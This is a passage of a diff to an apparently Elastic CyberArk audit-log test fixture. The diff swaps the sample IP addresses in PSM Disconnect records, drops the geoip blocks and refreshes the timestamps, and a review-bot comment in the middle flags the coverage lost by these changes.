Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" 
Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 04:12:09\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T11:12:09Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n 
\u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -1457,14 +1293,14 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "8b3d0b38-aef5-49d9-bdd7-d57706887d8b", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "session_duration": "00:37:10" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "success", "policy_id": "UnixSSH", 
@@ -1474,9 +1310,9 @@ "last_success_verification": "1615803764", "last_task": "VerifyTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Disconnect", "timestamp": "Mar 15 04:12:09", "desc": "PSM Disconnect" 
@@ -1488,8 +1324,8 @@ "event": { "severity": 2, "duration": 2230000000000, - "ingested": "2021-06-09T10:24:31.624822300Z", - "original": "\u003c5\u003e1 2021-03-15T11:12:09Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 04:12:09\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T11:12:09Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 04:12:09\",\"IsoTimestamp\":\"2021-03-15T11:12:09Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM 
Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813828200Z", + "original": "\u003c5\u003e1 2021-03-15T11:12:09Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 04:12:09\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T11:12:09Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n 
\u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 04:12:09\",\"IsoTimestamp\":\"2021-03-15T11:12:09Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 
System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -1512,39 +1348,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" 
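Review bot: This fixture no longer asserts geoip enrichment: the new side drops `destination.geo` and `source.geo` entirely instead of replacing them with whatever the test GeoIP database returns for 67.43.156.15 and 67.43.156.13, and the same removal appears in the hunks `@@ -1644,39 +1458,18 @@` and `@@ -1776,39 +1568,18 @@`. If these addresses were chosen because they are the ones the test database resolves, the absent blocks suggest the expected files were regenerated without the geoip lookup available and should be regenerated again; if no enrichment is expected for them, that is worth stating in the commit description so the lost coverage is a deliberate choice. Separately, `station`, `dst_host` and `ca_properties.address` now all carry 67.43.156.15, which shrinks the `ip` array in the following hunk (presumably `related.ip`) from three distinct addresses to two, so the case where three different addresses are collected is no longer exercised; a third address from the same supported subset for the station would keep that coverage.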
@@ -1561,7 +1376,7 @@
 },
 "@timestamp": "2021-03-15T13:18:36.000Z",
 "file": {
- "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian"
+ "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian"
 },
 "ecs": {
 "version": "1.12.0"
@@ -1572,16 +1387,15 @@ "adrian" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T13:18:36Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:18:36\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:18:36Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" 
Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:18:36\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:18:36Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" 
Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -1593,22 +1407,22 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "692fe25f-f940-4170-8ea4-5241b35173f0", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "session_duration": "00:00:05" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Disconnect", "timestamp": "Mar 15 06:18:36", "desc": "PSM Disconnect" 
@@ -1620,8 +1434,8 @@ "event": { "severity": 2, "duration": 5000000000, - "ingested": "2021-06-09T10:24:31.624824800Z", - "original": "\u003c5\u003e1 2021-03-15T13:18:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:18:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:18:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:18:36\",\"IsoTimestamp\":\"2021-03-15T13:18:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813833500Z", + "original": "\u003c5\u003e1 2021-03-15T13:18:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:18:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:18:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n 
\u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 
